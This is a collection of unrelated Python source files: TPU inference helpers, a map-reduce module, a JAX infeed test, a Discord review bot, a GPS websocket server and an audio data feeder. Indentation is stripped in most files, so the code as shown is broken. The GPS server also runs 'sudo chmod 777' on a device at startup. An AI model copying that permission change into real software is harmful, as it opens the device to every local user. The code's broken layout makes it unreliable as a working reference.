export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params,
experimental_export_device_assignment,
call_context=None):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
if experimental_export_device_assignment and call_context:
# Export the device assignment as part of the model. This is useful for
      # model parallel use cases where the model relies on the mapping between
# logical and physical devices.
with call_context.with_mode(_INFERENCE_ON_TPU_MODE) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
if experimental_export_device_assignment:
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
else:
tensors_on_cpu = tpu.rewrite(
tpu_computation, device_assignment=device_assignment)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
    # Makes a deep copy of `config` and `params` in case the user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
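# NOTE: The following sketch is illustrative only and is not part of the
# original library. It shows the intended use of `inference_on_tpu`: the
# computation is batched via batch_function and dispatched to TPU cores through
# TPUPartitionedCall. `features` and the batching parameters are hypothetical.
def _example_inference_on_tpu_sketch(features):  # pragma: no cover
  """Runs a toy identity computation through inference_on_tpu (illustration)."""
  def toy_computation(batched_features):
    # Any TPU-compatible computation works; an identity op stands in here.
    return [array_ops.identity(batched_features)]
  return inference_on_tpu(
      toy_computation,
      inputs_to_tpu=[features],
      num_batch_threads=1,
      max_batch_size=8,
      batch_timeout_micros=1000)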
map_reduce.py
"""
This is a multiprocessing-based map reduce computing model.
It differs from the normal MapReduce model:
- Manager fires up mapper and reducer processes simultaneously: the output type of a mapper is identical to that of \
a reducer, so reducers don't need to wait until all mappers finish.
- Data can be passed to mappers gradually: mappers keep waiting to consume data until the user signals that no more \
new data will be added.
- Reducing is not performed between two mappers' outputs (though the user-facing API looks like this) \
but between an output and a context: data pickling (serialization) and unpickling \
(deserialization) for IPC are time consuming. As an alternative, each reducer process holds a context \
which aggregates output in the reducing step. \
Once all output is reduced, reducing happens among the contexts.
- It doesn't support shuffling or reduce-by-key.
Example::
def mapper(x):
time.sleep(0.0001)
return x
def reducer(r1, r2):
return r1 + r2
mr = MapReduce(8, mapper, reducer)
mr.start()
for i in range(10000):
mr.add_task(i)
mr.task_done()
result = mr.join()
print(result)
"""
__all__ = ['MapReduce']
import multiprocess as mp
import multiprocess.queues as mpq
import queue
from typing import Callable
import sys
import logging
import uuid
import pickle
import math
from pyrallel import Paralleller
logger = logging.getLogger('MapReduce')
logger.setLevel(logging.ERROR)
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setFormatter(logging.Formatter('%(asctime)-15s %(name)s [%(levelname)s] %(message)s'))
logger.addHandler(stdout_handler)
class ChunkedQueue(mpq.Queue):
CHUNK_SIZE = 512 * 1024 * 1024
def __init__(self, *args, **kwargs):
ctx = mp.get_context()
super().__init__(*args, **kwargs, ctx=ctx)
self.buff = {}
def put(self, obj, block=True, timeout=None):
if not block:
return super().put(obj=obj, block=False, timeout=timeout)
chunk_size = self.__class__.CHUNK_SIZE
msg_id = uuid.uuid4()
msg_bytes = pickle.dumps(obj)
num_of_chunks = math.ceil(len(msg_bytes) / chunk_size)
logger.debug('putting data: #%s [%d], size: %d', msg_id, num_of_chunks, len(msg_bytes))
for i in range(num_of_chunks):
msg_obj = {
'b': msg_bytes[i * chunk_size : (i + 1) * chunk_size], # body
'u': msg_id, # msg id
'i': i + 1, # chunk id
'n': num_of_chunks # total number of chunks
}
super().put(obj=msg_obj, block=block, timeout=timeout)
def get(self, block=True, timeout=None):
if not block:
return super().get(block=False, timeout=timeout)
while True:
msg_obj = super().get(block=block, timeout=timeout)
logger.debug('getting data: #%s [%d/%d]', msg_obj['u'], msg_obj['i'], msg_obj['n'])
# small message
if msg_obj['u'] not in self.buff and msg_obj['i'] == msg_obj['n']:
return pickle.loads(msg_obj['b'])
# chunked message
if msg_obj['u'] not in self.buff:
self.buff[msg_obj['u']] = [None] * msg_obj['n']
self.buff[msg_obj['u']][msg_obj['i']-1] = msg_obj['b']
if msg_obj['i'] == msg_obj['n']:
msg = pickle.loads(b''.join(self.buff[msg_obj['u']]))
del self.buff[msg_obj['u']]
return msg
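# Illustrative note (assumption, not part of the original module): to callers this
# behaves like a plain multiprocess queue; a payload whose pickled size exceeds
# CHUNK_SIZE is split transparently on put() and reassembled on get(), e.g.
#
#   q = ChunkedQueue()
#   q.put({'key': 'value'})
#   assert q.get() == {'key': 'value'}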
class MapReduce(Paralleller):
"""
Args:
num_of_process (int): Number of process for both mappers and reducers.
mapper (Callable): Mapper function. The signature is `mapper(*args, **kwargs) -> object`.
        reducer (Callable): Reducer function. The signature is `reducer(object, object) -> object`.
`object` arguments are the returns from `mapper` s.
mapper_queue_size (int, optional): Maximum size of mapper queue, 0 by default means unlimited.
        reducer_queue_size (int, optional): Maximum size of the reducer queue, 0 by default means unlimited.
"""
CMD_NO_NEW_DATA = 1 # no more new user data
CMD_MAPPER_FINISH = 2 # mapper finished
CMD_REDUCER_WAITING = 3 # reducer is waiting
CMD_NO_RUNNING_MAPPER = 4 # no mapper is running
CMD_REDUCER_AWAKE = 5 # awake a reducer
CMD_REDUCER_KILL = 6 # kill a reducer
CMD_REDUCER_FINISH = 7 # reducer finished
def __init__(self, num_of_process: int, mapper: Callable, reducer: Callable,
mapper_queue_size: int = 0, reducer_queue_size: int = 0):
self._mapper_queue = mp.Queue(maxsize=mapper_queue_size)
self._reducer_queue = ChunkedQueue(maxsize=reducer_queue_size)
self._result_queue = ChunkedQueue()
self._mapper_cmd_queue = [mp.Queue() for _ in range(num_of_process)]
self._reducer_cmd_queue = [mp.Queue() for _ in range(num_of_process)]
self._manager_cmd_queue = mp.Queue()
self._manager_process = mp.Process(target=self._run_manager)
self._mapper_process = [mp.Process(target=self._run_mapper, args=(i, ))
for i in range(num_of_process)]
self._reducer_process = [mp.Process(target=self._run_reducer, args=(i, ))
for i in range(num_of_process)]
self._mapper = mapper
self._reducer = reducer
self._num_of_process = num_of_process
def start(self):
"""
Start all child processes.
"""
# start manager, mapper and reducer processes
self._manager_process.start()
for m in self._mapper_process:
m.start()
for r in self._reducer_process:
r.start()
def add_task(self, *args, **kwargs):
"""
Add data.
Args:
            args: Same as args in the `mapper` function.
            kwargs: Same as kwargs in the `mapper` function.
"""
self._mapper_queue.put( (args, kwargs) )
def task_done(self):
"""
No more new task.
"""
# no more user data
self._manager_cmd_queue.put( (self.__class__.CMD_NO_NEW_DATA,) )
def join(self):
"""
This method blocks until all mappers and reducers finish.
Returns:
object: The final reduced object.
"""
# reduced result
result = self._result_queue.get()
# make sure all child processes exited
# (do this after clean up all queues to avoid deadlock
# https://docs.python.org/3.6/library/multiprocessing.html?highlight=process#all-start-methods
# "Joining processes that use queues")
for m in self._mapper_process:
m.join()
for r in self._reducer_process:
r.join()
self._manager_process.join()
return result
def _run_manager(self):
running_mapper = [1 for _ in range(self._num_of_process)] # running mappers, 1 is running
running_reducer = [1 for _ in range(self._num_of_process)] # running reducers, 1 is running
waiting_reducer = [0 for _ in range(self._num_of_process)] # waiting reducers, 1 is waiting
killing_reducer = [0 for _ in range(self._num_of_process)] # killing reducers, 1 is asked to kill
# only return the index where mask shows 1
def apply_mask(mask):
for idx, m in enumerate(mask):
if m == 1:
yield idx
while True:
try:
cmd = self._manager_cmd_queue.get(timeout=0.1)
# no more user data, notify all mappers
if cmd[0] == self.__class__.CMD_NO_NEW_DATA:
for q in self._mapper_cmd_queue:
q.put( (self.__class__.CMD_NO_NEW_DATA,) )
# a mapper finished
elif cmd[0] == self.__class__.CMD_MAPPER_FINISH:
idx = cmd[1]
running_mapper[idx] = 0
# notify reducers if all mappers are finished
if sum(running_mapper) == 0:
for r in self._reducer_cmd_queue:
r.put( (self.__class__.CMD_NO_RUNNING_MAPPER,) )
# a reducer is waiting
# if all reducers are waiting,
                # ask half of them to kill themselves and release their held resources (context);
                # after they are killed, wake up the rest of the reducers
elif cmd[0] == self.__class__.CMD_REDUCER_WAITING:
idx = cmd[1]
waiting_reducer[idx] = 1
logger.info('waiting reducer #%d', idx)
# total num of running reducers
running_reducer_num = len(list(apply_mask(running_reducer)))
logger.info('running reducer num %d', running_reducer_num)
# only one reducer and nothing to reduce anymore
if running_reducer_num == 1:
# kill last reducer
idx = next(apply_mask(running_reducer))
self._reducer_cmd_queue[idx].put( (self.__class__.CMD_REDUCER_KILL,) )
# return result to main process
self._result_queue.put(self._reducer_queue.get())
return
# total num of waiting reducers
waiting_reducer_num = len(list(filter(lambda x: x > 0,
[waiting_reducer[idx] for idx in apply_mask(running_reducer)])))
logger.info('waiting reducer num %d', waiting_reducer_num)
logger.info('waiting reducer status %s', str(waiting_reducer))
# need to kill half of the reducers and release resources
if running_reducer_num == waiting_reducer_num:
# reset waiting reducer (for next round)
waiting_reducer = [0 for _ in range(self._num_of_process)]
# pick half of them to kill, notify these reducers
kill_reducer_num = running_reducer_num - int(running_reducer_num / 2)
notified_kill_reducer_num = 0
for idx in apply_mask(running_reducer):
self._reducer_cmd_queue[idx].put( (self.__class__.CMD_REDUCER_KILL,) )
killing_reducer[idx] = 1
notified_kill_reducer_num += 1
                            logger.info('killing reducer #%d', idx)
if kill_reducer_num == notified_kill_reducer_num:
break
# make sure these reducers are killed
while True:
cmd = self._manager_cmd_queue.get()
# other command, put it back
if cmd[0] != self.__class__.CMD_REDUCER_FINISH:
self._manager_cmd_queue.put(cmd)
else:
idx = cmd[1]
# reset state for killed reducer
running_reducer[idx] = 0
killing_reducer[idx] = 0
logger.info('reducer killed #%d', idx)
# all killed, wake up rest of the reducers
if sum(killing_reducer) == 0:
for idx in apply_mask(running_reducer):
logger.info('awaking reducer #%d', idx)
self._reducer_cmd_queue[idx].put( (self.__class__.CMD_REDUCER_AWAKE,) )
break
except queue.Empty:
continue
def _run_mapper(self, idx):
no_new_data = False
while True:
# cmd
try:
cmd = self._mapper_cmd_queue[idx].get_nowait()
if cmd[0] == self.__class__.CMD_NO_NEW_DATA:
no_new_data = True
except queue.Empty:
pass
# data
try:
data = self._mapper_queue.get(timeout=0.1)
args, kwargs = data[0], data[1]
result = self._mapper(*args, **kwargs)
self._reducer_queue.put(result)
except queue.Empty:
# no more new data, mapper finishes
if no_new_data:
self._manager_cmd_queue.put( (self.__class__.CMD_MAPPER_FINISH, idx) )
return
continue
def _run_reducer(self, idx):
no_running_mapper = False
context = None # it holds result of last reducing, and can be used in next reducing
while True:
# cmd
try:
cmd = self._reducer_cmd_queue[idx].get_nowait()
if cmd[0] == self.__class__.CMD_NO_RUNNING_MAPPER:
no_running_mapper = True
except queue.Empty:
pass
# data
try:
if context is None: # can't use "not" operator here, context could be empty object (list, dict, ...)
context = self._reducer_queue.get(timeout=0.1)
m = self._reducer_queue.get(timeout=0.1)
context = self._reducer(context, m)
except queue.Empty:
# there are still some alive mappers, wait for their output
if not no_running_mapper:
continue
# no data in reducer queue, ask manager and wait for further action
self._manager_cmd_queue.put( (self.__class__.CMD_REDUCER_WAITING, idx) )
cmd = self._reducer_cmd_queue[idx].get()
# awake
if cmd[0] == self.__class__.CMD_REDUCER_AWAKE:
continue
# kill itself, put context back to reducer queue
elif cmd[0] == self.__class__.CMD_REDUCER_KILL:
if context is not None:
self._reducer_queue.put(context)
self._manager_cmd_queue.put( (self.__class__.CMD_REDUCER_FINISH, idx) )
return
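# A minimal end-to-end sketch (not part of the original module): word counting,
# where the mapper emits a per-document dict of counts and the reducer merges two
# dicts. No reduce-by-key is needed because each reducer's context accumulates
# the merged counts directly.
if __name__ == '__main__':
    def count_words(doc):
        counts = {}
        for word in doc.split():
            counts[word] = counts.get(word, 0) + 1
        return counts

    def merge_counts(c1, c2):
        for word, n in c2.items():
            c1[word] = c1.get(word, 0) + n
        return c1

    mr = MapReduce(4, count_words, merge_counts)
    mr.start()
    for doc in ('a b a', 'b c', 'a c c'):
        mr.add_task(doc)
    mr.task_done()
    print(mr.join())  # counts: a=3, b=2, c=3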
|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as jnp
from jax import config
from jax.experimental import host_callback as hcb
from jax.lib import xla_client
import jax.test_util as jtu
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jtu.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), jnp.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), jnp.float32),))
return x + y + z
x = np.float32(1.5)
y = np.reshape(np.arange(12, dtype=np.float32), (3, 4)) # np.random.randn(3, 4).astype(np.float32)
z = np.random.randn(3, 1, 1).astype(np.float32)
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
device.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z)
def testInfeedPytree(self):
x = np.float32(1.5)
y = np.reshape(np.arange(12, dtype=np.int16), (3, 4))
to_infeed = dict(a=x, b=y)
to_infeed_shape = dict(a=jax.ShapedArray((), dtype=np.float32),
b=jax.ShapedArray((3, 4), dtype=np.int16))
@jax.jit
def f(x):
token = lax.create_token(x)
res, token = lax.infeed(token, shape=to_infeed_shape)
return res
device = jax.local_devices()[0]
# We must transfer the flattened data, as a tuple!!!
flat_to_infeed, _ = jax.tree_flatten(to_infeed)
device.transfer_to_infeed(tuple(flat_to_infeed))
self.assertAllClose(f(x), to_infeed)
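    # Note (illustrative, not from the original test): jax.tree_flatten orders dict
    # leaves by sorted key, so flat_to_infeed above is the values for 'a' then 'b':
    #   leaves, treedef = jax.tree_flatten(dict(a=1, b=2))
    #   assert leaves == [1, 2]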
def testInfeedThenOutfeed(self):
hcb.stop_outfeed_receiver()
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), jnp.float32))
token = lax.outfeed(token, y + np.float32(1))
return x - 1
x = np.float32(7.5)
y = np.random.randn(3, 4).astype(np.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
out, = device.transfer_from_outfeed(
xla_client.shape_from_pyval((y,)).with_major_to_minor_layout_if_absent())
execution.join()
self.assertAllClose(out, y + np.float32(1))
def testInfeedThenOutfeedInALoop(self):
hcb.stop_outfeed_receiver()
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), jnp.float32))
return lax.outfeed(token, y * np.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return n
device = jax.local_devices()[0]
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = np.random.randn(3, 4).astype(np.float32)
device.transfer_to_infeed((x,))
y, = device.transfer_from_outfeed(xla_client.shape_from_pyval((x,))
.with_major_to_minor_layout_if_absent())
self.assertAllClose(y, x * np.float32(2))
execution.join()
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
review.py
|
import p4
import discord
import utils
import net
import time
import re
from threading import Thread, Lock
mutex = Lock()
class p4bot_review:
def __init__(self):
self.storage = p4.Storage()
self.reviews = {}
self.exit_flag = True
try:
self.config = utils.create_config("config.json")
self.discord = discord.Discord(self.config, "review_webhook")
self.perforce = p4.init(self.config)
except AssertionError as error:
mutex.acquire()
self.exit_flag = False
mutex.release()
assert False, error
def get_handler(self, query):
if len(query) > 0:
            print '[p4dbot review] received request ' + str(query)
review = query['review']
status = query["status"]
change = query["change"]
project_name = query["project_name"]
review_data = p4.request_review(self.perforce, review[0])
mutex.acquire()
if review_data['data']['state'] != "archived":
self.need_to_add(review[0], review_data)
mutex.release()
return "{}"
pass
def need_to_add(self, rId, review):
reviewObject = self.reviews.get(rId)
        if reviewObject is None:
self.reviews.update({rId: review})
self.notif(review)
else:
self.validate(reviewObject, review)
def validate(self, reviewA, reviewB):
if reviewA['data']['state'] != reviewB['data']['state']:
self.status_changed(reviewB)
return True
elif len(reviewA['comments']) != len(reviewB['comments']):
self.comments_changed(reviewB)
return True
return False
def comments_changed(self, review):
self.reviews.update({review['id']: review})
self.notif(review,True)
def status_changed(self, review):
self.reviews.update({review['id']: review})
self.notif(review)
def clear(self):
return
def process(self):
while self.exit_flag:
for (key, review) in self.reviews.items():
mutex.acquire()
review_data = p4.request_review(self.perforce, key)
if review_data != None:
state = review_data["data"]["state"]
self.need_to_add(key, review_data)
if state == "archived":
del self.reviews[key]
mutex.release()
time.sleep(self.config["pull_interval"])
def find_user(self,user):
for users in self.config['discord']['users']:
if users['swarm'] == user:
return users["discord"]
return user
def mention(self,text,user):
regex = r"(@"+user+")"
subst = "<@"+self.find_user(user)+">"
# You can manually specify the number of replacements by changing the 4th argument
return re.sub(regex, subst, text, 0, re.MULTILINE)
def mentions(self,text):
for users in self.config['discord']['users']:
regex = r"(@"+users['swarm']+")"
subst = "<@"+users['discord']+">"
# You can manually specify the number of replacements by changing the 4th argument
text = re.sub(regex, subst, text, 0, re.MULTILINE)
return text
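    # Illustrative example (assumed config, not from the original file): with
    # config['discord']['users'] == [{'swarm': 'jdoe', 'discord': '1234'}],
    #   self.mentions("please review @jdoe") -> "please review <@1234>"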
def notif(self, review,comment = False):
review = review['data']
change = p4.Change()
change.user = review['author']
change.changelist = str(review['changes'][len(review['changes'])-1])
change.review = str(review['id'])
swarm_urls = p4.make_swarm_urls(change, self.perforce)
message = discord.Message()
message.user = change.user
        if review['state'] == 'approved':
            message.color = 0x7CFC00
        elif review['state'] == 'archived':
            message.color = 0xFFA500
        else:
            message.color = 0xc8702a
if not comment:
message.header = "Review #"+str(review['id'])+" Request from " + \
change.user+" Status: "+review['stateLabel']
else:
message.header = "Review #"+str(review['id'])+" Request from " + \
change.user+" New Comment!"
message.content = self.mentions(review['description'])+' Author:'+self.mentions("@"+review['author'])
message.footer = swarm_urls.review
message.url = swarm_urls.review
self.discord.send(message)
return
def init(self):
self.server = net.make_server(
self.config["server"]["host"], self.config["server"]["port"], self)
self.processThread = Thread(target=self.process)
self.processThread.start()
def shutdown(self):
self.server.socket.close()
mutex.acquire()
try:
self.exit_flag = False
finally:
mutex.release()
self.processThread.join()
bot = p4bot_review()
bot.init()
try:
print '[p4dbot review] start the server'
bot.server.serve_forever()
except KeyboardInterrupt:
print '[p4dbot review] shutting down the server'
bot.shutdown()
|
server.py
|
# GPS protocol analysis:
# http://www.techbulo.com/2508.html
# https://blog.csdn.net/lzyzuixin/article/details/6161507
# https://www.cnblogs.com/happykoukou/p/5502517.html
# Fix for the error "WARNING: Unsupported upgrade request.":
# http://www.04007.cn/article/977.html
import asyncio, serial, logging, time, os, random
import threading
from typing import Dict
from decimal import Decimal
from threading import Thread
from fastapi import FastAPI, WebSocket
from starlette.websockets import WebSocketState
if os.name == "nt":
SERIAL_PORT = "COM18"
elif os.name == "posix":
SERIAL_PORT = "/dev/ttyUSB0"
os.system(f'sudo chmod 777 {SERIAL_PORT}')
logging.basicConfig(
level=logging.NOTSET,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
clients = {}
gpsdata = {}
last_gpsdata = {}
ser = serial.Serial(port=SERIAL_PORT, baudrate=38400)
if not ser.is_open:
ser.open()
def convert_coord(value):
"""将GPS值转换为度分秒形式
Args:
value(str): GPS读取的经度或纬度
Returns:
list: 度分秒列表
"""
v1, v2 = value.split('.')
v2_dec = Decimal(f'0.{v2}') * 60 # + Decimal(random.random())
return [v1[:-2], v1[-2:], v2_dec.to_eng_string()]
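# Worked example (illustrative): an NMEA latitude such as "3958.1234" means
# 39 degrees 58.1234 minutes, so convert_coord("3958.1234") returns
# ['39', '58', '7.4040'], i.e. 39° 58' 7.404".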
def login(client_info: Dict[str, WebSocket]):
if client_info.get("id") in clients.keys():
try:
clients.get(client_info.get("id")).close()
except:
pass
clients.update(client_info)
    print('Number of connected clients:', len(clients))
def get_coord():
flag = 0
while True:
try:
if ser.inWaiting():
bin_data = ser.read_until()
# print(bin_data)
data = bin_data.decode().split(',')
if data[0] == "$GNRMC":
cn_time = f"{int(data[1][:2])+8}{data[1][2:6]}".rjust(
6, '0')
cn_time = f"{cn_time[:2]}:{cn_time[2:4]}:{cn_time[4:]}"
date = data[9]
date = f"{date[4:]}-{date[2:4]}-{date[:2]}"
gpsdata.update({
"时间":
cn_time,
"纬度": [*convert_coord(data[3]), data[4]],
"经度": [*convert_coord(data[5]), data[6]],
"速度":
(Decimal(data[7]) * Decimal("1.85")).to_eng_string(),
"方位角":
data[8],
"日期":
date,
})
flag = flag | 0b1
elif data[0] in ["$GPGGA", "$GNGGA"]: # GPS定位或GPS与北斗混合定位
gpsdata.update({
"GPS状态": {
"0": "未定位",
"1": "非差分定位",
"2": "差分定位",
"3": "无效PPS",
"6": "正在估算"
}.get(data[6], "错误"),
"卫里数量": data[7],
"海拔": data[9],
})
flag = flag | 0b10
elif data[0] == "$GPGSA":
gpsdata.update({
"PDOP综合位置精度因子":
data[15],
"HDOP水平精度因子":
data[16],
"VDOP垂直精度因子":
data[17].split('*')[0] if '*' in data[17] else '',
})
flag = flag | 0b100
if flag == 0b111:
flag = 0
else:
time.sleep(0.3)
except:
pass
Thread(target=get_coord).start()
app = FastAPI()
@app.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket):
logging.disable(logging.DEBUG)
await websocket.accept()
async def send_coord():
global last_gpsdata
while True:
try:
                await asyncio.sleep(0.1)
if gpsdata == last_gpsdata:
continue
await websocket.send_json(gpsdata)
last_gpsdata = gpsdata.copy()
                print(threading.current_thread())
except Exception as ex:
if websocket.client_state == WebSocketState.DISCONNECTED:
logger.info(f"websocket缓存子线程退出:{str(ex)}")
break
logger.info(f"websocket缓存子线程出错:{str(ex)}")
try:
while True:
            # listen for messages sent by the frontend client
            client_info = await websocket.receive_json()
            logger.info(('Received websocket client command:', client_info))
if client_info.get("cmd") == "login":
login({client_info.get("id"): websocket})
elif client_info.get("cmd") == "ping":
await websocket.send_json({"ping": "pong"})
elif client_info.get("cmd") == "startupdate":
Thread(target=asyncio.run, args=(send_coord(), )).start()
except Exception as ex:
logger.error(f"websocket断开:{str(ex)}")
|
feeder.py
|
import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split
import time
import threading
import os
from .util import is_scalar_input, is_mulaw_quantize
from infolog import log
from datasets import audio
from keras.utils import np_utils
_batches_per_group = 32
_pad = 0
class Feeder:
"""
Feeds batches of data into queue in a background thread.
"""
def __init__(self, coordinator, metadata_filename, base_dir, hparams):
super(Feeder, self).__init__()
if hparams.gin_channels > 0:
raise NotImplementedError('Global conditioning preprocessing has not been added yet, it will be out soon. Thanks for your patience!')
self._coord = coordinator
self._hparams = hparams
self._train_offset = 0
self._test_offset = 0
#Base directory of the project (to map files from different locations)
self._base_dir = base_dir
#Load metadata
self._data_dir = os.path.dirname(metadata_filename)
with open(metadata_filename, 'r') as f:
self._metadata = [line.strip().split('|') for line in f]
#Train test split
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches is not None
test_size = (hparams.wavenet_test_size if hparams.wavenet_test_size is not None
else hparams.wavenet_test_batches * hparams.wavenet_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.wavenet_data_random_state)
#Make sure test size is a multiple of batch size else round up
len_test_indices = _round_up(len(test_indices), hparams.wavenet_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.wavenet_batch_size
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches == self.test_steps
#Get conditioning status
self.local_condition, self.global_condition = self._check_conditions()
with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
if is_scalar_input(hparams.input_type):
input_placeholder = tf.placeholder(tf.float32, shape=(None, 1, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.float32, shape=(None, None, 1), name='audio_targets')
target_type = tf.float32
else:
input_placeholder = tf.placeholder(tf.float32, shape=(None, hparams.quantize_channels, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.int32, shape=(None, None, 1), name='audio_targets')
target_type = tf.int32
self._placeholders = [
input_placeholder,
target_placeholder,
tf.placeholder(tf.int32, shape=(None, ), name='input_lengths'),
]
queue_types = [tf.float32, target_type, tf.int32]
if self.local_condition:
self._placeholders.append(tf.placeholder(tf.float32, shape=(None, hparams.num_mels, None), name='local_condition_features'))
queue_types.append(tf.float32)
if self.global_condition:
self._placeholders.append(tf.placeholder(tf.int32, shape=(), name='global_condition_features'))
queue_types.append(tf.int32)
# Create queue for buffering data
            queue = tf.FIFOQueue(8, queue_types, name='input_queue')
self._enqueue_op = queue.enqueue(self._placeholders)
variables = queue.dequeue()
self.inputs = variables[0]
